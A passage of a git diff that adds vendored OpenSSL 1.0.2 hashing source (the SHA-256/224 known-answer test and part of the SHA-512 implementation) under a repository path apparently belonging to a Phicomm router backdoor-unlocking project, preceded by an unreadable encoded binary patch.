zBf8ec*~PNhjJ#;MA1ZQrNmuuBdBGCiLRlp@1U6d2!R(S9;?Lpeaj(6biF`uN>gvAX
z9;m@6cPX#-3)W*L<}pMbEG+Seq|T5z2RV}1f_8HaUO@T9p(tuZM3)7)dP2x%vm=B1
z+J)R2*aXR}pHR)245_e9Qx`_AL$1Ygihz~pDTc#6LW^rXtXUv&Thi1Hd4RK>SO|82
zs{_bop>+cz_d_?<5}i{dROD;B3dU9%`&!M8@p4mOvlUus?S%Fi?9ATLzyem=0I!q7
zaCWoMI#8r1cx-aMY~*sMYa!bw8?6f6Cs?<T2h~B%6xts2ivt1{wvvUD)f2MsihZw=
zeFMP2yaAXuvFSHC^AY6Oj7hQ&oys;(J0P@X)*-u*v?^TQ%UQdX+3FzDR->hm-I~cp
zggheD&&*B|RidKglVrU{vW5r+VM8-x+x+22chn<~MJ)XeY?OVLv|ge0A#2&F>@+*m
zglZKhyCjjvT?mhv$mUuL2O^>MBFj<VLOo7B4kGVV!N2E<d0QZoQ~Y`$699y2-~HRC
z&r_Nqg0$C`ism4+9yAB586c`HklcZ4w3-FhapcTS&RV(bQv10!0v(LVu2O0d(xl#C
zyZ1cOEIEJPuoM`u@`qa<p73_Y;n%4F#0n>2D^w$^`Ea+^ti#W&!)gZbb02EfY7Ok7
zdV<;mYSiiwtt6fukbA8Lu@ChL4jD+aXx$~NF<2#v6KPvuE5zF!;<oUa*G-N>N5-j#
zQQX>I^u%HGhrNOw(y7I?!DK2x!TPY)wVmn#yIT9Wyr{D#)G9iFQ2Y2tdEl!K%0+=J
zBW7I~48VCj_OvPhEQ%cS;b`0z(&cwTUgYMG$87R)^G^uDr#!aM%VnR=zT*ffC^@nv
zh$e27M{8-zNg)Thc`Dm%%0;#N(4Mg68X=bk3eimjT1ezeU*roPi7bgO+7c@BEZQ0p
zQF^X^YD9t6*-0)tboE=V^#pOS<K$hsC4_F*hGXmqbv<Z;d3dkZB-o%(FLKXgrCc7t
z<}6)3jsn!x3v{|?nQhPlX~-^GOOEt|XRy>Inpi^Ml+V)HajqUgK=0MnUOiTs2F(h2
z<a1wnH2f+oIw#~XH&1)a1f0+T(W5-}jE{VJ4t7BEEg>>yo{-0d{DPY&VY|;v<TCJF
zm`x<?I2r0$v@OKdJ}3!GN1<IIVlO1TW_D(veG?*)$&Qc@@;oyISDSInqo)svXf5`j
zOKLq-J7`o$R21?U@*J0)idcA@qQ_=>U=W@}j{1=AjBYMj<dL#y?S_zGEkbJ(+IhBL
z4yxznklB_AgM`{|p7Pi-OHkd>+ATj6!||{Lk#R!yDoi<SY0A}0a8S8iO1}CArXUeE
zgsAm%b^%X3l?Ke>>OR~%3I*$>>q-`CUYFkr?HfM4PuDJRt({Z*1236CKZH>;V}&`a
zS2n`4eso3FYi+~5rIGF}vC4Fc5TdMpULJ*LA&<fTa6W|zQL=(`ZREHwy6EE&mj~n#
zb1)laNP(dPEH*obM?UkFdulhqH^;CZ$I$yu*(TwM6(N6_B;Uc4ei-JN9fYh+u&rgh
z+JT#!pWMr>JEI>~LksN;Y_;0jd36X;^K&ge+%o~;qyDRo%3itzcIK*stW$Qwwk)~@
zb_zMdOs$))fat-;sq-F7vg10k3${Q}+noK5IdR*Z1cIMSac4(h5ENEVsiRQ+)ezMH
z$90f$!8Q$7G?+prc%Gi;fnu`Bwjj&a+%lH#r&*Q<vWC&nhe2VrbF@cv2~^<)EYZm^
zCs?o6sqIB4ApiARw>)YdLPc*M)#->G@}L1*wWG6UsCqrAs<Tlz6S_)VY|wwLssSA?
zko!qf16M&O*Whur&(dC3o6+>kC4z>#8H~sfo~Ns*dF$$FbW~>IF__>s*CG%gbc3&T
z`H7D6d-xMEAsq1Q>`z>d=;|&`n$eZDH5YXOGKT)@oD_h%IF1JGJd{BZXHx2`;J6;u
zK^#ZW8g08wt1*HrGAN%i3Y{?suje5jNXe5rZk=d{RxdQoTwF7Q=ymgShRbLNJg_w+
zJWJ6y)vs`>=qj|sp%UH}lFd*pL-(v*fXfBW72uJ+=sp9&13R39$KIedb8Qr7kiZ*B
z7LPP#T{(w@dd@zE>_f;of!K(ynNWd_AnTa7T0W#wQOa{xw`+!F?T~j8X}m~h-$t5m
zu&B_lpz)Rvb><RX;>12>8<_B!&8V%>a?jHLu%6}#c8beUBO(HMe%yX!kFKG2Q7^~o
zHD32DTZEPlW`Qi$2UJrg8^m>e0**Jia~NmbKI?d+i?2Fp-?ehhjx?NW45v(o*^C4{
zi8~}3BJPclrJlqQNJYgX7fXE&w~dUA38Yev@Zb$gc<_GeSs$3e)k8+KFaTVE2QQI8
zPZIzZ2zj%Rv(tr~nI)gek+bt;WxkwQAY^6Xz`)mIV@A||L0)Q1O}E~d!{hpKkSfLt
zJL!#j;iG&Jf0RGQtDDaHetN-(t@Ru70*il`Pc(A)?0bo_+CqZ2@Bim<W@gX&yA7FU
zZ2wW;%981ic!v#HmSt>b<Ktu3-mm~CN?D$<{q2`WmTsMUVFy+P+v$D(FR=Dote^Pm
znx`86@We+J>-w{GGwwY%_br?Ca}RkR+!Px3y3P8%1ChVFspIIv6xI!Ud>e+q2_Fk&
zS1i2;pn}f^h8(Rl<X$6kvcOZ}U*#FAz}JI=QuiC?iJz$R1JU^*qhU`t6pYmr1!I%1
zpA}2bHzF7BUz;&2GJ5}-vJXqa$B+qQQulw69cQ;1a>$TpgYv8XUk<^y^3xCLR>I;z
zd3;vv(Re}+VX2&bkGQOvF_=%A<$<$Xg{p@J@pS^&+n|EQCXD80p2+CG(c*;mL5RrF
zxS{ScCN&uihr&MjXvl~(7l8$KKzd}S?NB>vO;?;daPGUYF$$oi=RnhGd&R4Qv1LV;
zAEM79I%ju@UlcuWj3tc7*t9jb%!=jDuxum)zA`3_7_!$k^j$+9>HiJ5urZ5hnq%cx
zDKtiOrr+?j7;@$>`{xjO+;Rxqk(lYYB094+a=tKpP2{|P^;#Am{5ie@<a-SHi6OfU
z^K`++;5bj|M%)DmWuAafPUmf`8ka^m)riE?4QyZCZrM7x?ti`2zq);}i85VTdmkiM
z)|w~MrZ=v6Kbjv&)}euPX!yPk4WvVZYK+AP6XbC#jd|59d485W6O7$LOy}dv6ul`X
zeUK7?b@&>Eyz<PF`;1sEqAG{%nv+98xhp7lJFC<1lLhWr2^N>BaO|zSO1YAlpgj8j
zPLY9EM#sjW+n*2m{zV^_=z9-+jG+%C^r?bA9MEe#y-m}rExm2hJ0QK9(VG&zt<bB3
z`Q+<gzErVeXxBfPzV<hB0xKpD-2U!{@B@ec_5DQ$H;$}%=)qsSwtN?Rr)8q&{ls&R
z{PFDgqq{18`*zQROLk{GF=<kML-v18oTlAed};aQzqvklT4mL$?3$0VpITGg+W11l
z<oZ|M?EmBMW-t5kJ1e8J8-M>`ZQ`c>SGofk|M*G6UEXh3zVTGvjpo*yvTE=7X>hGE
z@q>@wzw_U73a3Bt?*2J*cW+sEc13aM^ouWtS1fsJUH-b34OwZ4O&7*?Y#ywgw{`gU
zBRjrX_p4o%2ETpEU3dFeF0K#zS1j|-U0G9CSsC=R;*#Pi{wY)Z4=k?pPbpz{DN4o6
znfLmO=0Co=F1*@5y?API$?fc()z*?dJEf$!<jzSpn!KEjAN8Ga_*KlAucRqToNyle
zXi)E_q5j=Nin=aOy*Vc{Ycm>{0UY&m8g=+Ws+4*2UQR3X7W{*!%<GS(mwAgejpN>u
zmom6_S|qc=`?czM$mg8~6!#W^1f<wf=FPI@hb&GwM4Xv)TAzZOf%Rqwmqtx=t~W21
z7W5Wu@^G*JrF7vfij1r9mZr6Oi^{!z?n>ZIyV^TIPCUDu{nt1%;l6ZWuQL~6KJUPl
zB&Xb)w<%5c7QEyUUVkLrQ>uCkxUD?V28aej(w{{;hiEIjZ>VWccngGMrb4vy{)e>W
z_w^2~t1Gepp+ThS%9*PckLRji$|=Tfl)ul_V`atnaoJd=CGoLh4%}bkr&`(L&^tO$
zwD9SQ-$A>%QtaRz^yTNY_9XLh2`qeO(&`H6QL?Tqk|2+Ab&q+Jj3g=>M7>yfk@{fv
z58xL8e;q7#?RWDv<ltMW7BF0V7%<TXDA6#iyv6(?euV$owS-kJYrGjS;qP$pZce`G
z;D7Gmt-J*84-S6wbpSA|9K`$qevU{&UmneXi2qI3+bEa5-NFCP!Mh$j0Q|KS7bmW_
z+S?RmRcJB#QSlN7sD8Y5#geD1mo5%3u3k~Uw5DE}jmOIJ;;B=oPO+!yN_9nWZW#|&
z&n+*n)T^qicv(=dR;sI4g%@M*lF-xD%N9RbtDx6SnQ~|Kthy(|7JS#;--G9`gp?YW
zDrp6}s`|xstCp>(U+!)!f3j||%Tbv-PoIOPS-qsT24pr1DCx+%LJCG}YU)=#xuQ<F
z*-0_<MJq;^#_X}ci8J*|0$u#SIB_6)dgkVRyMrej#l@vRn1m<L#UD$;-;jj=CJFze
zBz&e5w^V(K9K5TK%YS|nJ*AY3Uy_7R)~7BBpRCU_N%&-aHYeee{o{u$8l(^X+)?WQ
zF5a!L=Tq=*eZ883ck63k3f`@+{uI1hUzbwwZhaLw`R?lD)>l;u-mRnOQ}AvbDaEUP
zy*#}5am?X*dk(o!eNFA+;&9Enuu@EQqZB{BYL!x4zrtQDS+RV1O&y-qtq9i?<7~d&
zDide@MBVD*mGvuD*3^f8jXlJvCRDwwe(~}e$D;q+<i~b0DYavk0!QOLC%*RTa(i%>
z%FTc%7fUZ=Y+&7w?b$sC$74xy+)iF#KURL`;8Rbi!4$a;x!a!Hr7{^1@l4(CUT9`q
zrnCWn%9>$KdL`$mMM4KN#;s1g?UkbVUBH>AV<wW46#T7JJQ%mx)8&7cojaG|i3?vQ
z0x;j%pNu0omG&Xv=+sQre}S{#k7vol^}maI3IOp;-M`M+Pj|rNk-DF<@M`gIp~S%W
z+MX1OKb<x1emDMClTBN)sL5b#bQH@0OlM^3e&YFOu?KGRP58s;x2MbhDdynJyZZj^
NPD7`2J$a<=|8G?bF3SJ_

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256t.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256t.c
new file mode 100644
index 0000000..35dbbc2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha256t.c
@@ -0,0 +1,158 @@
+/* crypto/sha/sha256t.c */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ * ====================================================================
+ */
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include <openssl/sha.h>
+#include <openssl/evp.h>
+
+#if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA256)
+int main(int argc, char *argv[])
+{
+    printf("No SHA256 support\n");
+    return (0);
+}
+#else
+
+unsigned char app_b1[SHA256_DIGEST_LENGTH] = {
+    0xba, 0x78, 0x16, 0xbf, 0x8f, 0x01, 0xcf, 0xea,
+    0x41, 0x41, 0x40, 0xde, 0x5d, 0xae, 0x22, 0x23,
+    0xb0, 0x03, 0x61, 0xa3, 0x96, 0x17, 0x7a, 0x9c,
+    0xb4, 0x10, 0xff, 0x61, 0xf2, 0x00, 0x15, 0xad
+};
+
+unsigned char app_b2[SHA256_DIGEST_LENGTH] = {
+    0x24, 0x8d, 0x6a, 0x61, 0xd2, 0x06, 0x38, 0xb8,
+    0xe5, 0xc0, 0x26, 0x93, 0x0c, 0x3e, 0x60, 0x39,
+    0xa3, 0x3c, 0xe4, 0x59, 0x64, 0xff, 0x21, 0x67,
+    0xf6, 0xec, 0xed, 0xd4, 0x19, 0xdb, 0x06, 0xc1
+};
+
+unsigned char app_b3[SHA256_DIGEST_LENGTH] = {
+    0xcd, 0xc7, 0x6e, 0x5c, 0x99, 0x14, 0xfb, 0x92,
+    0x81, 0xa1, 0xc7, 0xe2, 0x84, 0xd7, 0x3e, 0x67,
+    0xf1, 0x80, 0x9a, 0x48, 0xa4, 0x97, 0x20, 0x0e,
+    0x04, 0x6d, 0x39, 0xcc, 0xc7, 0x11, 0x2c, 0xd0
+};
+
+unsigned char addenum_1[SHA224_DIGEST_LENGTH] = {
+    0x23, 0x09, 0x7d, 0x22, 0x34, 0x05, 0xd8, 0x22,
+    0x86, 0x42, 0xa4, 0x77, 0xbd, 0xa2, 0x55, 0xb3,
+    0x2a, 0xad, 0xbc, 0xe4, 0xbd, 0xa0, 0xb3, 0xf7,
+    0xe3, 0x6c, 0x9d, 0xa7
+};
+
+unsigned char addenum_2[SHA224_DIGEST_LENGTH] = {
+    0x75, 0x38, 0x8b, 0x16, 0x51, 0x27, 0x76, 0xcc,
+    0x5d, 0xba, 0x5d, 0xa1, 0xfd, 0x89, 0x01, 0x50,
+    0xb0, 0xc6, 0x45, 0x5c, 0xb4, 0xf5, 0x8b, 0x19,
+    0x52, 0x52, 0x25, 0x25
+};
+
+unsigned char addenum_3[SHA224_DIGEST_LENGTH] = {
+    0x20, 0x79, 0x46, 0x55, 0x98, 0x0c, 0x91, 0xd8,
+    0xbb, 0xb4, 0xc1, 0xea, 0x97, 0x61, 0x8a, 0x4b,
+    0xf0, 0x3f, 0x42, 0x58, 0x19, 0x48, 0xb2, 0xee,
+    0x4e, 0xe7, 0xad, 0x67
+};
+
+int main(int argc, char **argv)
+{
+    unsigned char md[SHA256_DIGEST_LENGTH];
+    int i;
+    EVP_MD_CTX evp;
+
+    fprintf(stdout, "Testing SHA-256 ");
+
+    EVP_Digest("abc", 3, md, NULL, EVP_sha256(), NULL);
+    if (memcmp(md, app_b1, sizeof(app_b1))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 1 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_Digest("abcdbcde" "cdefdefg" "efghfghi" "ghijhijk"
+               "ijkljklm" "klmnlmno" "mnopnopq", 56, md, NULL, EVP_sha256(),
+               NULL);
+    if (memcmp(md, app_b2, sizeof(app_b2))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 2 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_MD_CTX_init(&evp);
+    EVP_DigestInit_ex(&evp, EVP_sha256(), NULL);
+    for (i = 0; i < 1000000; i += 160)
+        EVP_DigestUpdate(&evp, "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa",
+                         (1000000 - i) < 160 ? 1000000 - i : 160);
+    EVP_DigestFinal_ex(&evp, md, NULL);
+    EVP_MD_CTX_cleanup(&evp);
+
+    if (memcmp(md, app_b3, sizeof(app_b3))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 3 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    fprintf(stdout, " passed.\n");
+    fflush(stdout);
+
+    fprintf(stdout, "Testing SHA-224 ");
+
+    EVP_Digest("abc", 3, md, NULL, EVP_sha224(), NULL);
+    if (memcmp(md, addenum_1, sizeof(addenum_1))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 1 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_Digest("abcdbcde" "cdefdefg" "efghfghi" "ghijhijk"
+               "ijkljklm" "klmnlmno" "mnopnopq", 56, md, NULL, EVP_sha224(),
+               NULL);
+    if (memcmp(md, addenum_2, sizeof(addenum_2))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 2 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    EVP_MD_CTX_init(&evp);
+    EVP_DigestInit_ex(&evp, EVP_sha224(), NULL);
+    for (i = 0; i < 1000000; i += 64)
+        EVP_DigestUpdate(&evp, "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa"
+                         "aaaaaaaa" "aaaaaaaa" "aaaaaaaa" "aaaaaaaa",
+                         (1000000 - i) < 64 ? 1000000 - i : 64);
+    EVP_DigestFinal_ex(&evp, md, NULL);
+    EVP_MD_CTX_cleanup(&evp);
+
+    if (memcmp(md, addenum_3, sizeof(addenum_3))) {
+        fflush(stdout);
+        fprintf(stderr, "\nTEST 3 of 3 failed.\n");
+        return 1;
+    } else
+        fprintf(stdout, ".");
+    fflush(stdout);
+
+    fprintf(stdout, " passed.\n");
+    fflush(stdout);
+
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512.c
new file mode 100644
index 0000000..3bf66ae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha512.c
@@ -0,0 +1,684 @@
+/* crypto/sha/sha512.c */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved
+ * according to the OpenSSL license [found in ../../LICENSE].
+ * ====================================================================
+ */
+#include <openssl/opensslconf.h>
+#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA512)
+/*-
+ * IMPLEMENTATION NOTES.
+ *
+ * As you might have noticed 32-bit hash algorithms:
+ *
+ * - permit SHA_LONG to be wider than 32-bit (case on CRAY);
+ * - optimized versions implement two transform functions: one operating
+ *   on [aligned] data in host byte order and one - on data in input
+ *   stream byte order;
+ * - share common byte-order neutral collector and padding function
+ *   implementations, ../md32_common.h;
+ *
+ * Neither of the above applies to this SHA-512 implementations. Reasons
+ * [in reverse order] are:
+ *
+ * - it's the only 64-bit hash algorithm for the moment of this writing,
+ *   there is no need for common collector/padding implementation [yet];
+ * - by supporting only one transform function [which operates on
+ *   *aligned* data in input stream byte order, big-endian in this case]
+ *   we minimize burden of maintenance in two ways: a) collector/padding
+ *   function is simpler; b) only one transform function to stare at;
+ * - SHA_LONG64 is required to be exactly 64-bit in order to be able to
+ *   apply a number of optimizations to mitigate potential performance
+ *   penalties caused by previous design decision;
+ *
+ * Caveat lector.
+ *
+ * Implementation relies on the fact that "long long" is 64-bit on
+ * both 32- and 64-bit platforms. If some compiler vendor comes up
+ * with 128-bit long long, adjustment to sha.h would be required.
+ * As this implementation relies on 64-bit integer type, it's totally
+ * inappropriate for platforms which don't support it, most notably
+ * 16-bit platforms.
+ *                                      <appro@fy.chalmers.se>
+ */
+# include <stdlib.h>
+# include <string.h>
+
+# include <openssl/crypto.h>
+# include <openssl/sha.h>
+# include <openssl/opensslv.h>
+
+# include "cryptlib.h"
+
+const char SHA512_version[] = "SHA-512" OPENSSL_VERSION_PTEXT;
+
+# if defined(__i386) || defined(__i386__) || defined(_M_IX86) || \
+    defined(__x86_64) || defined(_M_AMD64) || defined(_M_X64) || \
+    defined(__s390__) || defined(__s390x__) || \
+    defined(__aarch64__) || \
+    defined(SHA512_ASM)
+#  define SHA512_BLOCK_CAN_MANAGE_UNALIGNED_DATA
+# endif
+
+fips_md_init_ctx(SHA384, SHA512)
+{
+    c->h[0] = U64(0xcbbb9d5dc1059ed8);
+    c->h[1] = U64(0x629a292a367cd507);
+    c->h[2] = U64(0x9159015a3070dd17);
+    c->h[3] = U64(0x152fecd8f70e5939);
+    c->h[4] = U64(0x67332667ffc00b31);
+    c->h[5] = U64(0x8eb44a8768581511);
+    c->h[6] = U64(0xdb0c2e0d64f98fa7);
+    c->h[7] = U64(0x47b5481dbefa4fa4);
+
+    c->Nl = 0;
+    c->Nh = 0;
+    c->num = 0;
+    c->md_len = SHA384_DIGEST_LENGTH;
+    return 1;
+}
+
+fips_md_init(SHA512)
+{
+    c->h[0] = U64(0x6a09e667f3bcc908);
+    c->h[1] = U64(0xbb67ae8584caa73b);
+    c->h[2] = U64(0x3c6ef372fe94f82b);
+    c->h[3] = U64(0xa54ff53a5f1d36f1);
+    c->h[4] = U64(0x510e527fade682d1);
+    c->h[5] = U64(0x9b05688c2b3e6c1f);
+    c->h[6] = U64(0x1f83d9abfb41bd6b);
+    c->h[7] = U64(0x5be0cd19137e2179);
+
+    c->Nl = 0;
+    c->Nh = 0;
+    c->num = 0;
+    c->md_len = SHA512_DIGEST_LENGTH;
+    return 1;
+}
+
+# ifndef SHA512_ASM
+static
+# endif
+void sha512_block_data_order(SHA512_CTX *ctx, const void *in, size_t num);
+
+int SHA512_Final(unsigned char *md, SHA512_CTX *c)
+{
+    unsigned char *p = (unsigned char *)c->u.p;
+    size_t n = c->num;
+
+    p[n] = 0x80;                /* There always is a room for one */
+    n++;
+    if (n > (sizeof(c->u) - 16))
+        memset(p + n, 0, sizeof(c->u) - n), n = 0,
+            sha512_block_data_order(c, p, 1);
+
+    memset(p + n, 0, sizeof(c->u) - 16 - n);
+# ifdef  B_ENDIAN
+    c->u.d[SHA_LBLOCK - 2] = c->Nh;
+    c->u.d[SHA_LBLOCK - 1] = c->Nl;
+# else
+    p[sizeof(c->u) - 1] = (unsigned char)(c->Nl);
+    p[sizeof(c->u) - 2] = (unsigned char)(c->Nl >> 8);
+    p[sizeof(c->u) - 3] = (unsigned char)(c->Nl >> 16);
+    p[sizeof(c->u) - 4] = (unsigned char)(c->Nl >> 24);
+    p[sizeof(c->u) - 5] = (unsigned char)(c->Nl >> 32);
+    p[sizeof(c->u) - 6] = (unsigned char)(c->Nl >> 40);
+    p[sizeof(c->u) - 7] = (unsigned char)(c->Nl >> 48);
+    p[sizeof(c->u) - 8] = (unsigned char)(c->Nl >> 56);
+    p[sizeof(c->u) - 9] = (unsigned char)(c->Nh);
+    p[sizeof(c->u) - 10] = (unsigned char)(c->Nh >> 8);
+    p[sizeof(c->u) - 11] = (unsigned char)(c->Nh >> 16);
+    p[sizeof(c->u) - 12] = (unsigned char)(c->Nh >> 24);
+    p[sizeof(c->u) - 13] = (unsigned char)(c->Nh >> 32);
+    p[sizeof(c->u) - 14] = (unsigned char)(c->Nh >> 40);
+    p[sizeof(c->u) - 15] = (unsigned char)(c->Nh >> 48);
+    p[sizeof(c->u) - 16] = (unsigned char)(c->Nh >> 56);
+# endif
+
+    sha512_block_data_order(c, p, 1);
+
+    if (md == 0)
+        return 0;
+
+    switch (c->md_len) {
+        /* Let compiler decide if it's appropriate to unroll... */
+    case SHA384_DIGEST_LENGTH:
+        for (n = 0; n < SHA384_DIGEST_LENGTH / 8; n++) {
+            SHA_LONG64 t = c->h[n];
+
+            *(md++) = (unsigned char)(t >> 56);
+            *(md++) = (unsigned char)(t >> 48);
+            *(md++) = (unsigned char)(t >> 40);
+            *(md++) = (unsigned char)(t >> 32);
+            *(md++) = (unsigned char)(t >> 24);
+            *(md++) = (unsigned char)(t >> 16);
+            *(md++) = (unsigned char)(t >> 8);
+            *(md++) = (unsigned char)(t);
+        }
+        break;
+    case SHA512_DIGEST_LENGTH:
+        for (n = 0; n < SHA512_DIGEST_LENGTH / 8; n++) {
+            SHA_LONG64 t = c->h[n];
+
+            *(md++) = (unsigned char)(t >> 56);
+            *(md++) = (unsigned char)(t >> 48);
+            *(md++) = (unsigned char)(t >> 40);
+            *(md++) = (unsigned char)(t >> 32);
+            *(md++) = (unsigned char)(t >> 24);
+            *(md++) = (unsigned char)(t >> 16);
+            *(md++) = (unsigned char)(t >> 8);
+            *(md++) = (unsigned char)(t);
+        }
+        break;
+        /* ... as well as make sure md_len is not abused. */
+    default:
+        return 0;
+    }
+
+    return 1;
+}
+
+int SHA384_Final(unsigned char *md, SHA512_CTX *c)
+{
+    return SHA512_Final(md, c);
+}
+
+int SHA512_Update(SHA512_CTX *c, const void *_data, size_t len)
+{
+    SHA_LONG64 l;
+    unsigned char *p = c->u.p;
+    const unsigned char *data = (const unsigned char *)_data;
+
+    if (len == 0)
+        return 1;
+
+    l = (c->Nl + (((SHA_LONG64) len) << 3)) & U64(0xffffffffffffffff);
+    if (l < c->Nl)
+        c->Nh++;
+    if (sizeof(len) >= 8)
+        c->Nh += (((SHA_LONG64) len) >> 61);
+    c->Nl = l;
+
+    if (c->num != 0) {
+        size_t n = sizeof(c->u) - c->num;
+
+        if (len < n) {
+            memcpy(p + c->num, data, len), c->num += (unsigned int)len;
+            return 1;
+        } else {
+            memcpy(p + c->num, data, n), c->num = 0;
+            len -= n, data += n;
+            sha512_block_data_order(c, p, 1);
+        }
+    }
+
+    if (len >= sizeof(c->u)) {
+# ifndef SHA512_BLOCK_CAN_MANAGE_UNALIGNED_DATA
+        if ((size_t)data % sizeof(c->u.d[0]) != 0)
+            while (len >= sizeof(c->u))
+                memcpy(p, data, sizeof(c->u)),
+                    sha512_block_data_order(c, p, 1),
+                    len -= sizeof(c->u), data += sizeof(c->u);
+        else
+# endif
+            sha512_block_data_order(c, data, len / sizeof(c->u)),
+                data += len, len %= sizeof(c->u), data -= len;
+    }
+
+    if (len != 0)
+        memcpy(p, data, len), c->num = (int)len;
+
+    return 1;
+}
+
+int SHA384_Update(SHA512_CTX *c, const void *data, size_t len)
+{
+    return SHA512_Update(c, data, len);
+}
+
+void SHA512_Transform(SHA512_CTX *c, const unsigned char *data)
+{
+# ifndef SHA512_BLOCK_CAN_MANAGE_UNALIGNED_DATA
+    if ((size_t)data % sizeof(c->u.d[0]) != 0)
+        memcpy(c->u.p, data, sizeof(c->u.p)), data = c->u.p;
+# endif
+    sha512_block_data_order(c, data, 1);
+}
+
+unsigned char *SHA384(const unsigned char *d, size_t n, unsigned char *md)
+{
+    SHA512_CTX c;
+    static unsigned char m[SHA384_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    SHA384_Init(&c);
+    SHA512_Update(&c, d, n);
+    SHA512_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c));
+    return (md);
+}
+
+unsigned char *SHA512(const unsigned char *d, size_t n, unsigned char *md)
+{
+    SHA512_CTX c;
+    static unsigned char m[SHA512_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    SHA512_Init(&c);
+    SHA512_Update(&c, d, n);
+    SHA512_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c));
+    return (md);
+}
+
+# ifndef SHA512_ASM
+static const SHA_LONG64 K512[80] = {
+    U64(0x428a2f98d728ae22), U64(0x7137449123ef65cd),
+    U64(0xb5c0fbcfec4d3b2f), U64(0xe9b5dba58189dbbc),
+    U64(0x3956c25bf348b538), U64(0x59f111f1b605d019),
+    U64(0x923f82a4af194f9b), U64(0xab1c5ed5da6d8118),
+    U64(0xd807aa98a3030242), U64(0x12835b0145706fbe),
+    U64(0x243185be4ee4b28c), U64(0x550c7dc3d5ffb4e2),
+    U64(0x72be5d74f27b896f), U64(0x80deb1fe3b1696b1),
+    U64(0x9bdc06a725c71235), U64(0xc19bf174cf692694),
+    U64(0xe49b69c19ef14ad2), U64(0xefbe4786384f25e3),
+    U64(0x0fc19dc68b8cd5b5), U64(0x240ca1cc77ac9c65),
+    U64(0x2de92c6f592b0275), U64(0x4a7484aa6ea6e483),
+    U64(0x5cb0a9dcbd41fbd4), U64(0x76f988da831153b5),
+    U64(0x983e5152ee66dfab), U64(0xa831c66d2db43210),
+    U64(0xb00327c898fb213f), U64(0xbf597fc7beef0ee4),
+    U64(0xc6e00bf33da88fc2), U64(0xd5a79147930aa725),
+    U64(0x06ca6351e003826f), U64(0x142929670a0e6e70),
+    U64(0x27b70a8546d22ffc), U64(0x2e1b21385c26c926),
+    U64(0x4d2c6dfc5ac42aed), U64(0x53380d139d95b3df),
+    U64(0x650a73548baf63de), U64(0x766a0abb3c77b2a8),
+    U64(0x81c2c92e47edaee6), U64(0x92722c851482353b),
+    U64(0xa2bfe8a14cf10364), U64(0xa81a664bbc423001),
+    U64(0xc24b8b70d0f89791), U64(0xc76c51a30654be30),
+    U64(0xd192e819d6ef5218), U64(0xd69906245565a910),
+    U64(0xf40e35855771202a), U64(0x106aa07032bbd1b8),
+    U64(0x19a4c116b8d2d0c8), U64(0x1e376c085141ab53),
+    U64(0x2748774cdf8eeb99), U64(0x34b0bcb5e19b48a8),
+    U64(0x391c0cb3c5c95a63), U64(0x4ed8aa4ae3418acb),
+    U64(0x5b9cca4f7763e373), U64(0x682e6ff3d6b2b8a3),
+    U64(0x748f82ee5defb2fc), U64(0x78a5636f43172f60),
+    U64(0x84c87814a1f0ab72), U64(0x8cc702081a6439ec),
+    U64(0x90befffa23631e28), U64(0xa4506cebde82bde9),
+    U64(0xbef9a3f7b2c67915), U64(0xc67178f2e372532b),
+    U64(0xca273eceea26619c), U64(0xd186b8c721c0c207),
+    U64(0xeada7dd6cde0eb1e), U64(0xf57d4f7fee6ed178),
+    U64(0x06f067aa72176fba), U64(0x0a637dc5a2c898a6),
+    U64(0x113f9804bef90dae), U64(0x1b710b35131c471b),
+    U64(0x28db77f523047d84), U64(0x32caab7b40c72493),
+    U64(0x3c9ebe0a15c9bebc), U64(0x431d67c49c100d4c),
+    U64(0x4cc5d4becb3e42b6), U64(0x597f299cfc657e2a),
+    U64(0x5fcb6fab3ad6faec), U64(0x6c44198c4a475817)
+};
+
+#  ifndef PEDANTIC
+#   if defined(__GNUC__) && __GNUC__>=2 && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+#    if defined(__x86_64) || defined(__x86_64__)
+#     define ROTR(a,n)    ({ SHA_LONG64 ret;              \
+                                asm ("rorq %1,%0"       \
+                                : "=r"(ret)             \
+                                : "J"(n),"0"(a)         \
